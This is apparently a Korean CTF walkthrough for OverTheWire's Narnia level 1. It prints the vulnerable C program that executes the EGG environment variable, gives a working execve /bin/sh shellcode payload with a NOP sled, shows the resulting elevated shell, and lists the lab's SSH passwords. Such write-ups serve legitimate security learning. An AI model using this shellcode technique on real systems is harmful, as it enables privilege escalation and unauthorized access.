ssh -p 2226 narnia1@narnia.labs.overthewire.org
pw: efeidiedae
/narnia/ 디렉터리에서 narnia1.c파일의 내용을 확인해보자
// narnia1.c
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
int main(){
int (*ret)();
if(getenv("EGG")==NULL){
printf("Give me something to execute at the env-variable EGG\n");
exit(1);
}
printf("Trying to execute EGG!\n");
ret = getenv("EGG");
ret();
return 0;
}
main 함수에서 EGG라는 이름의 환경변수가 있는지 확인한 후에 함수 포인터 ret에 EGG의 값을 대입하고 있다.
환경변수 EGG값에 쉘 코드의 주소를 삽입한 후에 실행시키면 셀을 획득할 수 있을 것 같다.
공격 시나리오는 다음과 같다.
아래와 같은 명령어를 통해 EGG 환경변수를 만든다.
narnia1@narnia:/tmp/narnia1_tmp$ export EGG=`python -c 'print "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
narnia1@narnia:/tmp/narnia1_tmp$
이제 바이너리를 실행시켜보자
narnia1@narnia:/tmp/narnia1_tmp$ /narnia/narnia1
Trying to execute EGG!
$ id
uid=14001(narnia1) gid=14001(narnia1) euid=14002(narnia2) groups=14001(narnia1)
$
쉘을 획득했다.
id: narnia2
pw: nairiepecu